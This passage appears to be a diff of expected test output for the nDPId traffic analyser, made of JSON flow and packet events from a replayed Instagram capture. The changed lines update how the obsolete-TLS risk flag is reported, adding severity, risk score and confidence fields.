 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
-01325{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
-01325{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
-01325{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
-01325{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
+00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}}
+01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1436720908719,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1436720908719,"pkt":"AAAAAAAAAAAAAAAACABFwABYvRgAAEABOq7AqABnwKgAZwMDAwcAAAAARQAAPLKEQABABvFRwKgAZ63CKBTA\/QG7ZKZcEQAAAACgAjkIlxQAAAIEBbQEAggKAAPulQAAAAABAwMG"}
 02359{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1436720908720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":1436720908720,"pkt":"QPMIw47hABsv8H60CABFAAWqkOBAAFUGUh0fDV00wKgAZwG7g+MQ445PobbjVYAQANmoZAAAAQEICvAgso0AA+57FwMBBgAJWuxAFmWJOuMXXLFPa+ihsePS3XMy0YIQztBBVmLMKv7bKksLnHy6Qejj3IofgvBbzBtV3GqDkMg6uh0P6N7FwcSe3tUjgcGiijvn6K818Zp8xqjp0tEb5pWvqXYqObddd2Hnzu6vQfWb9eTm5eWBjMWaH+46WOkF+yLDu28OnCnI6DRA4hVUhPFmv3Y3Jc5EGy9h1liFAXpPz8RauF02nsY9w0LD3TtF0JwByoPONdeUPZq\/WKka9SPqVUAIaUqD+iiuPiB4iY\/P40454jR2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6